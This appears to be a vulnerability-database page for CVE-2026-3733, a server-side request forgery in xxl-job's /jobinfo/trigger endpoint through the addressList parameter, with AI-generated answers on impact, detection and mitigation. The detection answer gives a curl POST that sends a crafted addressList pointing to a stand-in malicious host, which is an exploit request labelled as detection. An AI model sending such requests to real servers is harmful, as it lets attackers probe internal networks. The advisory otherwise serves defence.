CVE-2026-3733
Received Received - Intake
Server-Side Request Forgery in xuxueli xxl-job JobInfoController

Publication date: 2026-03-08

Last updated on: 2026-04-29

Assigner: VulDB

Description
A vulnerability was detected in xuxueli xxl-job up to 3.3.2. This impacts an unknown function of the file source-code/src/main/java/com/xxl/job/admin/controller/JobInfoController.java. The manipulation results in server-side request forgery. It is possible to launch the attack remotely. The exploit is now public and may be used. The project maintainer closed the issue report with the following statement: "Access token security verification is required." (translated from Chinese)
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-03-08
Last Modified
2026-04-29
Generated
2026-05-07
AI Q&A
2026-03-08
EPSS Evaluated
2026-05-05
NVD
EUVD
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
xuxueli xxl-job to 3.3.2 (inc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-918 The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?

[{'type': 'paragraph', 'content': 'CVE-2026-3733 is a Server-Side Request Forgery (SSRF) vulnerability found in the xuxueli xxl-job project, specifically affecting versions up to 3.3.2.'}, {'type': 'paragraph', 'content': "The vulnerability exists in the /jobinfo/trigger endpoint where the 'addressList' parameter, which controls the target URI for network requests, is user-controllable and lacks proper validation."}, {'type': 'paragraph', 'content': 'This flaw allows an attacker to manipulate the parameter to make the server send arbitrary HTTP POST requests to internal or external services, potentially probing or exploiting internal network resources.'}, {'type': 'paragraph', 'content': 'The vulnerable code does not validate or restrict the URL parameter before making network requests, enabling remote exploitation without requiring local access.'}] [1, 2, 3]


How can this vulnerability impact me? :

This SSRF vulnerability can allow attackers to make the vulnerable server send requests to arbitrary internal or external services.

As a result, attackers may be able to scan internal networks, access sensitive internal services, or exploit other vulnerabilities within the internal environment that are not directly accessible from outside.

This can lead to unauthorized access, data exposure, or further compromise of the affected system and its network.


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:

I don't know


How can this vulnerability be detected on my network or system? Can you suggest some commands?

[{'type': 'paragraph', 'content': 'The vulnerability can be detected by monitoring and analyzing requests to the vulnerable endpoint `/jobinfo/trigger` in the xuxueli xxl-job application. Specifically, look for unusual or crafted HTTP POST requests containing the `addressList` parameter, which is user-controllable and exploited for SSRF.'}, {'type': 'paragraph', 'content': 'Detection can involve inspecting web server logs or network traffic for requests to `/xxl-job-admin/jobinfo/trigger` with suspicious or unexpected URLs in the `addressList` parameter.'}, {'type': 'paragraph', 'content': 'Commands to help detect exploitation attempts might include:'}, {'type': 'list_item', 'content': "Using curl to simulate or detect suspicious requests: `curl -v -X POST 'http://<target>/xxl-job-admin/jobinfo/trigger' -d 'id=1&executorParam=test&addressList=http://malicious-url.com'`"}, {'type': 'list_item', 'content': "Using grep to search web server logs for requests to the vulnerable endpoint: `grep '/xxl-job-admin/jobinfo/trigger' /var/log/nginx/access.log`"}, {'type': 'list_item', 'content': 'Monitoring DNS logs or outbound HTTP requests from the server to detect unexpected external calls triggered by SSRF.'}] [2]


What immediate steps should I take to mitigate this vulnerability?

Immediate mitigation steps include implementing strict validation and sanitization of the `addressList` parameter to ensure it only allows requests to authorized and safe domains or IP ranges.

Additionally, enforce access token security verification as recommended by the project maintainer to restrict unauthorized access to the vulnerable endpoint.

Network-level controls such as firewall rules or outbound request filtering can help prevent the server from making arbitrary HTTP requests to internal or external services.

If possible, update to a patched version of the software or apply any available patches that address this SSRF vulnerability.


Ask Our AI Assistant
Need more information? Ask your question to get an AI reply (Powered by our expertise)
0/70
EPSS Chart